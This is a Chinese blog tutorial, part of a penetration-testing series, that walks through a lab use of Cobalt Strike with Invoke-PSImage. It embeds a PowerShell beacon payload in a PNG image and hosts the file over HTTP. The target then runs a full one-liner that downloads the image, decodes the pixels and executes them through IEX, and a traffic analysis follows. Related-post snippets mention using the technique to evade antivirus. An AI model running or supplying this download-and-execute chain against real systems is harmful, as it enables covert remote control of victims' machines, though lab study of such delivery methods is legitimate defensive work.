【渗透测试】CS4.0的使用(四)

最新推荐文章于 2024-05-12 09:47:11 发布
最新推荐文章于 2024-05-12 09:47:11 发布
阅读量1k 收藏 2
点赞数 1
分类专栏: 内网 渗透测试 文章标签: web安全 安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/120748180
版权

目录

【渗透测试】CS4.0的使用(四)

一、试验环境

kali:10.95.16.113
windows10:10.95.16.112 (无防护)
工具:Invoke-PSImage
https://github.com/peewpw/Invoke-PSImage

二、实验步骤
1、kali端本地启动cs4.3

kali端本地启动cs4.3的teamserver,客户端指定host为127.0.0.1启动(详情如下链接)
【渗透测试】CS4.0的使用(三).

2、创建监听

在这里插入图片描述

3、使用cs生成一个powershell的payload

在这里插入图片描述
生成文件
在这里插入图片描述

4、使用Invoke-PSImage生成shell图片
powershell.exe -exec bypass "Import-Module ./Invoke-PSImage.ps1;Invoke-PSImage -Script .\payload.ps1 -image .\test01.jpg -Out .\test02.png -Web"

在这里插入图片描述
【使用test01.jpg图片,生成test02.png图片shell】

5、将生成的图片上传到自己的服务器上

这里由于是内网实验环境,所以使用kali起了一个http服务模拟这个环节

python3 -m http.server 80

在这里插入图片描述
【这里GET是112执行了命令之后触发的】

6、在目标机器上执行攻击代码,cs上线

在112的powershell中执行以下命令

powershell sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://10.95.16.113/test02.png"));$o=a Byte[] 3840;(0..1)|%{foreach($x in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))
【其中http://10.95.16.113/test02.png部分修改成自己的图片网络地址】

成功上线
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

三、流量分析

说明: 执行了sal命令之后,目标机会先和服务器链接,然后和kali连接(实验中服务器和kali是同一台机器)

1、目标机器和服务器三次握手

在这里插入图片描述

2、请求test02.png图片

在这里插入图片描述

3、目标机和kali握手【通过444端口】

在这里插入图片描述

4、稳定连接

在这里插入图片描述
在这里插入图片描述

久违 °
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【CS学习笔记】1、如何搭建自己的渗透测试环境
TeamsSix 的 CSDN 空间
04-19 868
0x00 前言 第一次接触CS的时候,是有人在群里发了一个CS最新版的安装包,当时第一反应,CS ??? 作为小白的我,在角落里看着群里的大佬们讨论的十分起劲儿,而我这个萌新对于他们所讨论的东西却听都没听过。 于是乎,新的一期学习笔记开整,本期学习笔记如题:《Cobalt Strike学习笔记》,简称《CS学习笔记》,这期笔记预计会更新28篇文章,学习资源来自B站视频,视频链接在文章底部。 由于这...
cs4.1 编译与安装
weixin_33836874的博客
11-18 450
cs4.1编译报 https://issues.apache.org/jira/browse/CLOUDSTACK-2913 cs4.1安装报 转载于:https://www.cnblogs.com/heidsoft/p/3429348.html
探索安全边界:Invoke-PSImage - 可执行PNG的隐藏力量
最新发布
gitblog_00075的博客
05-12 401
探索安全边界:Invoke-PSImage - 可执行PNG的隐藏力量 项目地址:https://gitcode.com/peewpw/Invoke-PSImage 在网络安全领域,创新和隐蔽性是两大关键要素。今天,我们要向您介绍一个令人惊叹的开源工具——Invoke-PSImage,它将PowerShell脚本编码到PNG图像像素中,创造出一种看似无害但实际上可以执行代码的图片。这种创新技术为渗...
渗透测试】CS4.0的使用(三)
SunnyCat
10-09 3954
目录【渗透测试】CS4.0的使用(二)一、实验环境二、实验步骤1、kali本地启动cs4.02、生成beacon.exe后门文件3、各种意淫技巧让目标主机执行这个exe文件4、cs上线5、流量分析 【渗透测试】CS4.0的使用(二) 一、实验环境 kali:10.95.16.113 windows10:10.95.16.112 (无防护) 二、实验步骤 1、kali本地启动cs4.0 本地启动teamserver服务端,teamserver的ip为当前机器的ip,这里不能写成127.0.0.1,这个ip要
​CS客户端渗透测试详解(三)
weixin_46137328的博客
01-08 4783
本篇文章主要讲述的漏洞点如下:逆向修改代码逻辑SQL语句暴露用户名枚举SQL注入CSV注入弱口令XSS命令执行功能逻辑漏洞密码明文传输DLL劫持授权认证缺陷未授权访问非必要的数据传输客户...
渗透测试】CS4.0的使用(一)
SunnyCat
12-31 6436
渗透测试】CS4.0的使用(一) 前期条件:java环境,cs4.0工具 我的实验环境: vps一台(我的cs部署在自己的vps上)
CobaltStrike4.0渗透测试手册
03-18
《Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具。Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
CobaltStrike4.0用户手册_中文翻译|cs用户手册
05-23
网上收集到的CobaltStrike4.0中文实用手册,该资源仅供交流学习实用,请勿用于其它用途,该资源仅供交流学习实用,请勿用于其它用途。解压密码为123321
CobaltStrike4.0版本(内含使用说明书)
11-04
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。
CobaltStrike4.0用户手册中文.rar
06-08
Cobalt Strike是一款高级的渗透测试工具,专为红队操作和模拟攻击设计。它以其强大的功能和灵活性在安全行业中享有盛誉。本手册聚焦于Cobalt Strike 4.0版本,这是一个重要的更新,引入了许多新特性、优化和改进。 ...
CobaltStrike4.0.zip
03-11
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
Invoke-PSImage
04-25
调用PSImage 将PowerShell脚本编码为PNG文件的像素,并生成一个oneliner以执行 Invoke-PSImage使用PowerShell脚本并将该脚本的字节编码为PNG图像的像素。 它从Web的文件中生成一个oneliner来执行。 它可以仅使用有效载荷数据来创建新图像,也可以将有效载荷嵌入现有图像的最低有效字节中,从而看起来像真实的图片。 图像保存为PNG,并且可以无损压缩,而不会影响执行有效载荷的能力,因为数据本身以颜色存储。 创建新图像时,通常会对常规PowerShell脚本进行显着压缩,通常会生成png,其文件大小约为原始脚本的50%。 使用embed方法时,每个像素中2个颜色值的最低有效4位用于保存有效负载。 结果会影响图像质量,但看起来仍然不错。 它可以接受大多数图像类型作为输入,但是输出始终是PNG,因为它需要无损。 图像的每个像素都用于保存脚本的一
渗透测试神器CS(4.0)的使用
qq_50854662的博客
08-21 6185
CS CS简介CS功能安装CSCS的基本使用深入标题介绍 Beacon Commands基础操作演示 CS简介 CS 是Cobalt Strike的简称,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF...
渗透测试神器CobaltStrike基本使用教程
大河之犬的博客
05-09 1738
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作CS集成了端口转发、服务扫描,自动化溢出,多模式端口监听,exe、powershell木马生成等特性为一体钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。
Cobalt Strike beacon详解
qq_38348692的博客
08-18 3442
这篇文章接着上一篇weblogic漏洞拿到beacon开始写的,拿beacon的过程详细请看上上一篇文章:[WebLogic wls9-async 反序列化漏洞(CNVD-C-2019-48814)复现](https://blog.csdn.net/qq_38348692/article/details/99676809)。 beacon 中输入和help,查看所有的命令,及翻译: Beaco...
利用CS4.0和FRP拿下“打牌”网站服务器
sjyyyyyyyy的博客
10-26 1533
利用CS4.0和FRP拿下“打牌”网站服务器环境的部署CS4.0服务器部署新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 环境的部署 CS4.0服务器部署 这里用的是阿里云服务器,也可以部署在本地 首先上传cs4.0压缩包
Invoke-PSImage-master对图片代码隐写
Tonylytdv的博客
08-29 595
今天逛帖子偶然看见用图片可以隐藏恶意代码的方法,于是展开了研究。 先从github上下载了项目 Invoke-PSImage 使用方法如下,打开powershell(打开cmd是没有用的) 进入到Invoke-PSImage文件夹目录 一、检测执行策略是否支持 先使用下面的命令测试,当前powershell是否支持使用脚本 Get-ExecutionPolicy 如果出现如图情况,是可以使用的 如果出现Restricted需要重新设置执行策略 Set-ExecutionPolicy -Executio
CS制作office宏病毒钓鱼
qq_53297395的博客
05-19 2105
一、实验目的 1. 利用CobaltStrile生成word宏病毒的钓鱼payload,实现远程控制对方主机 二、实验器材 1.vmware 15.5 2.kali linux 3.cobaltstrike 4.windows 10两台 5.office 2019 三、实验内容 1.让kali作为cs的服务器端,一个win10作为cs的客户端,另一个win 10作为被攻击者,先看kali的ip:10.138.128.128 2.进入cobaltstrike文件夹,查看默认的cs密码.
Invoke-PSImage免杀过360杀毒
weixin_50217210的博客
03-05 380
它会利用图片中的每个像素点最后4位有效位的2个颜色值来储存Payload数据,虽然图片的质量会受到影响,但是一般来说是看不到太大区别。图片需要存储为PNG格式,由于payload数据存储在颜色值中,因此这种格式进行无损压缩并且不会影响到payload的执行,它可以接受目前绝大多数类型的图片类型进行输入,但输出必须是PNG格式,因此输出的图片数据需要是无损的。图片的每一个像素都需要存储脚本的一个字节,所以你需要根据脚本中的字节数据大小来选择图片(尽可能多的像素点)。应该是图片选择的不合适,
PC端(cs客户端)渗透测试规范
03-19
本文档主要介绍了PC端CS客户端的渗透测试规范,包括检测工具、检测人员与时间、检测结果汇总、以及客户端安全、账号安全、通信安全和业务逻辑安全等多个方面的详细检测内容。 渗透测试网络安全领域的重要环节,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值